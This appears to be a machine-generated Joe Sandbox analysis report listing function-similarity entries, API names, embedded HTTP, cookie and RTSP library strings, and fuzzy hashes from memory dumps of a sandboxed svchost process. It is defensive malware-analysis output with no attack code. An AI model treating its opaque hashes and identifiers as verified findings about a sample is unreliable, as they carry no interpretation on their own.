                                                                                                                                                                                • API String ID: 3404610657-636008438
                                                                                                                                                                                • Opcode ID: 75feec41bc58d8237de1606e07d75a2a89c7d8b6503371e87cd49d359ab39879
                                                                                                                                                                                • Instruction ID: 557f3356f8d29b0272bd265c0626b0fd54e24d0ff4c7081776253f57c2dc52c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 75feec41bc58d8237de1606e07d75a2a89c7d8b6503371e87cd49d359ab39879
                                                                                                                                                                                • Instruction Fuzzy Hash: B0B16B22A0DB8286EBA58B2D959437967A0FF4C7C8F0C5135DF4D43695EF3DE4A28308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupstrchr
                                                                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced
                                                                                                                                                                                • API String ID: 3727083984-636008438
                                                                                                                                                                                • Opcode ID: 99e1ab0e26be4e62482e3479878cc70d8f2b520f3779ae4d042e46afe63a3eb6
                                                                                                                                                                                • Instruction ID: 722859fc49909ec6f226ed6beac580c8864acf7e9aa302ad918072f94c8b4b9e
                                                                                                                                                                                • Opcode Fuzzy Hash: 99e1ab0e26be4e62482e3479878cc70d8f2b520f3779ae4d042e46afe63a3eb6
                                                                                                                                                                                • Instruction Fuzzy Hash: 58B15A22A0DB8286EBA58B2D959437967A0FF4C7C8F0C5135DF4D43695EF7DE4A28308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strtol
                                                                                                                                                                                • String ID: CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Transport:$Unable to read the CSeq header: [%s]$Unable to read the interleaved parameter from Transport header: [%s]$interleaved=
                                                                                                                                                                                • API String ID: 76114499-2090227408
                                                                                                                                                                                • Opcode ID: f3d1836794aff0557316c3a16ba33936c9893d707d401da435f5d5cbce64a226
                                                                                                                                                                                • Instruction ID: 1b397cc4b5f4201d6d9b4901d0949ff183f81dcd77f45fc6fe633ead9199c1ca
                                                                                                                                                                                • Opcode Fuzzy Hash: f3d1836794aff0557316c3a16ba33936c9893d707d401da435f5d5cbce64a226
                                                                                                                                                                                • Instruction Fuzzy Hash: 1391A121B0D65A86EA648B1EE8502BD6791EF4DBC0F8C4031DF9E47695EF3DE9438708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupcallocfreemallocstrrchr
                                                                                                                                                                                • String ID: Request has same path as previous transfer$Uploading to a URL without a filename$path contains control characters
                                                                                                                                                                                • API String ID: 3403504057-3156345716
                                                                                                                                                                                • Opcode ID: fc61dfaadbb5fa38191a6861e84ca2bdc69bd9905fce18f7f24a2270c540f510
                                                                                                                                                                                • Instruction ID: f02524b037ef6c611297384dfae0bf47e581125c2e103267d327b5bc5197775f
                                                                                                                                                                                • Opcode Fuzzy Hash: fc61dfaadbb5fa38191a6861e84ca2bdc69bd9905fce18f7f24a2270c540f510
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F919F26A0DB8685EB618F2AA4146796BA1EB89BC9F4C4035DF4D07795DF3CE843C708
                                                                                                                                                                                APIs
                                                                                                                                                                                • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 682832D1
                                                                                                                                                                                • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 68283381
                                                                                                                                                                                • abort.MSVCRT ref: 682833EF
                                                                                                                                                                                • pthread_rwlock_wrlock.LIBWINPTHREAD-1 ref: 6828341A
                                                                                                                                                                                • free.MSVCRT ref: 6828345B
                                                                                                                                                                                • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 68283467
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abortfreepthread_mutex_lockpthread_mutex_unlockpthread_rwlock_unlockpthread_rwlock_wrlock
                                                                                                                                                                                • String ID: 8`)h$@`)h$c:/pgBuild64/share/locale
                                                                                                                                                                                • API String ID: 3379943660-3689085214
                                                                                                                                                                                • Opcode ID: 81afa4b7123b088a623e5ef584f2d6df36a93d5f6ab68d04874ba304e0dfd4de
                                                                                                                                                                                • Instruction ID: cafc0ba0edcefb4b94de35a7e00dbc7d41b28b4e68cd82c72fe0e5fa22b6ecd6
                                                                                                                                                                                • Opcode Fuzzy Hash: 81afa4b7123b088a623e5ef584f2d6df36a93d5f6ab68d04874ba304e0dfd4de
                                                                                                                                                                                • Instruction Fuzzy Hash: BC519FB170574FC1EF158F1BE8683A923A2BB45FC9FC88225CE6957394EF29C0698340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strchrstrrchr$SimpleString::operator=strstr
                                                                                                                                                                                • String ID: .$/$/$/
                                                                                                                                                                                • API String ID: 1705091533-2604304129
                                                                                                                                                                                • Opcode ID: e57a33d11676b8911ff4455b6276873fafef546af2385976949fcf42f14c47a8
                                                                                                                                                                                • Instruction ID: 80c2d2d042969346e3ee6131a385504a42cd714c7c342b5d3486244d0999edbe
                                                                                                                                                                                • Opcode Fuzzy Hash: e57a33d11676b8911ff4455b6276873fafef546af2385976949fcf42f14c47a8
                                                                                                                                                                                • Instruction Fuzzy Hash: 40519291A0DAC249FB619B2994603BA6AD18F59BC0F5C4035DF8D067DAEF6CE8438319
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memchrstrncmp
                                                                                                                                                                                • String ID: HTTP 1.0, assume close after body$HTTP/$Header without colon$Nul byte in header$RTSP/$Unsupported HTTP version (%u.%d) in response$Unsupported HTTP version in response$Unsupported HTTP/1 subversion in response$Version mismatch (from HTTP/%u to HTTP/%u)$gfff$gfff
                                                                                                                                                                                • API String ID: 2166067702-2742729457
                                                                                                                                                                                • Opcode ID: f7f395ad54c3d76228806e24ca110d8be347be2e48f47592a687c6f8d20ac730
                                                                                                                                                                                • Instruction ID: 0a296106ea0717f3aad2326cc0d2611bfa32adcba16c68f2b63f76292a969a69
                                                                                                                                                                                • Opcode Fuzzy Hash: f7f395ad54c3d76228806e24ca110d8be347be2e48f47592a687c6f8d20ac730
                                                                                                                                                                                • Instruction Fuzzy Hash: 20020372A081824AEB68CB2D85606FC77A1FB0ABC8F4C4135D75947686DF2CF557CB0A
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$calloc$malloc
                                                                                                                                                                                • String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$Negotiate$SPNEGO handshake failure (empty challenge message)$SSPI: could not get auth info
                                                                                                                                                                                • API String ID: 3103867982-2506987382
                                                                                                                                                                                • Opcode ID: 1eb3c980ef82608690a77840d43b96d1d148339de077344c4af62d4694f9da26
                                                                                                                                                                                • Instruction ID: fadd9773274fc811e0d7188102ccc6d493bf0ec5cf40ab250bd6c09643ed966f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1eb3c980ef82608690a77840d43b96d1d148339de077344c4af62d4694f9da26
                                                                                                                                                                                • Instruction Fuzzy Hash: 58D127B2A09B468AEB508F29E8502AD37A5FB48BC8F58043ADF4D47758DF78D846C744
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualQuery.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CE94
                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CEB6
                                                                                                                                                                                Strings
                                                                                                                                                                                • Unknown pseudo relocation bit size %d., xrefs: 6828CF6A
                                                                                                                                                                                • VirtualQuery failed for %d bytes at address %p, xrefs: 6828CCBA, 6828CFB3
                                                                                                                                                                                • Unknown pseudo relocation protocol version %d., xrefs: 6828CFCA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$ProtectQuery
                                                                                                                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                                                                                                • API String ID: 1027372294-974437099
                                                                                                                                                                                • Opcode ID: 2752f869f49eda997246e6d9b4ac340988e297aacd72a7d5716d20230ee3a07e
                                                                                                                                                                                • Instruction ID: 7848499f30e46e56733167479c57ee5d6fc3df53bbe755c731f941633a4f6d41
                                                                                                                                                                                • Opcode Fuzzy Hash: 2752f869f49eda997246e6d9b4ac340988e297aacd72a7d5716d20230ee3a07e
                                                                                                                                                                                • Instruction Fuzzy Hash: ECA122F670060A8AEF549B7AD8507596363BB85BA9FD4C612CD29477D8CB3EC48E8301
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdup$calloc
                                                                                                                                                                                • String ID: application/octet-stream$k
                                                                                                                                                                                • API String ID: 149330190-2522224428
                                                                                                                                                                                • Opcode ID: 867c9ec2344b6d6b5d44ad890a696e954738310f8e9801029e65761f37424b81
                                                                                                                                                                                • Instruction ID: 7651dc80225fdf172d90f6f30405e3d2f85d980251803fcec62114f64543b89e
                                                                                                                                                                                • Opcode Fuzzy Hash: 867c9ec2344b6d6b5d44ad890a696e954738310f8e9801029e65761f37424b81
                                                                                                                                                                                • Instruction Fuzzy Hash: 60C11C6AA0AB4686EB658F1D94507392BE5EB48BDCF1C0134CF5D46794DF3DD892C308
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF8B83AFB40: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B83AFB6A
                                                                                                                                                                                  • Part of subcall function 00007FF8B83AFB40: strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF8B83AFBC9
                                                                                                                                                                                  • Part of subcall function 00007FF8B83AFB40: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B83AFBDF
                                                                                                                                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B836FB3F
                                                                                                                                                                                • strchr.VCRUNTIME140 ref: 00007FF8B836FC78
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno$_strdupstrchrstrtoll
                                                                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced
                                                                                                                                                                                • API String ID: 1600025112-636008438
                                                                                                                                                                                • Opcode ID: 3f04f876884eb4adef0daf39e738af3ec45646b6708ddaf2eb6b91afb300afd8
                                                                                                                                                                                • Instruction ID: d47ef3ec84ad1841e4d158f46ce944eaaf08ab0c85066b52ec89d9ca084a1a63
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f04f876884eb4adef0daf39e738af3ec45646b6708ddaf2eb6b91afb300afd8
                                                                                                                                                                                • Instruction Fuzzy Hash: 10B16C22A0DB8286EBA58B2D955437967A0FF4C7C8F0C5135DF4D47695EF3DE4A28308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strchr$_strdup
                                                                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced
                                                                                                                                                                                • API String ID: 2235204152-636008438
                                                                                                                                                                                • Opcode ID: d4585a927e5e40224f40cde82fef82b675107ba1ffcef9096db20523d4639305
                                                                                                                                                                                • Instruction ID: 5684e16307b257014ee9a224b9fa9e356380aa183fdce2ce291494834a541476
                                                                                                                                                                                • Opcode Fuzzy Hash: d4585a927e5e40224f40cde82fef82b675107ba1ffcef9096db20523d4639305
                                                                                                                                                                                • Instruction Fuzzy Hash: 73B16C22A0DB8286EBA58B2D955437967A0FF4C7C8F0C5135DF4D43695DF3DE4A28308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdup
                                                                                                                                                                                • String ID: .netrc$.netrc parser error$Couldn't find host %s in the %s file; using defaults
                                                                                                                                                                                • API String ID: 2653869212-330727394
                                                                                                                                                                                • Opcode ID: 3eab983721b366ad51e4fce91ae505139bbfff39743a46e5c984cd0e69c1452b
                                                                                                                                                                                • Instruction ID: e20b7b3167c46d795b5ada1d659f065f9b10c5cbe6b61e9ccb246b3fe79e4382
                                                                                                                                                                                • Opcode Fuzzy Hash: 3eab983721b366ad51e4fce91ae505139bbfff39743a46e5c984cd0e69c1452b
                                                                                                                                                                                • Instruction Fuzzy Hash: 917158A1A0AE82CAEAA5CF6DD5502B863A0FB4CBC4F084435DB4D87794DF3CE552C748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdupmemmovestrchr
                                                                                                                                                                                • String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s
                                                                                                                                                                                • API String ID: 3135372282-2673429991
                                                                                                                                                                                • Opcode ID: 45960bc86d4ea597b072731bc8fc11b2a9896187746d1d5201c0fcc71be787e1
                                                                                                                                                                                • Instruction ID: 43eee4d6c85b16ea177789a95e07ba044a4b4edb00a26c8b764edefd54937eb3
                                                                                                                                                                                • Opcode Fuzzy Hash: 45960bc86d4ea597b072731bc8fc11b2a9896187746d1d5201c0fcc71be787e1
                                                                                                                                                                                • Instruction Fuzzy Hash: FE617931A09A8296EB159F29E8502B973A0FB48BC4F4C4132DF5D47796DF3CE55ACB08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
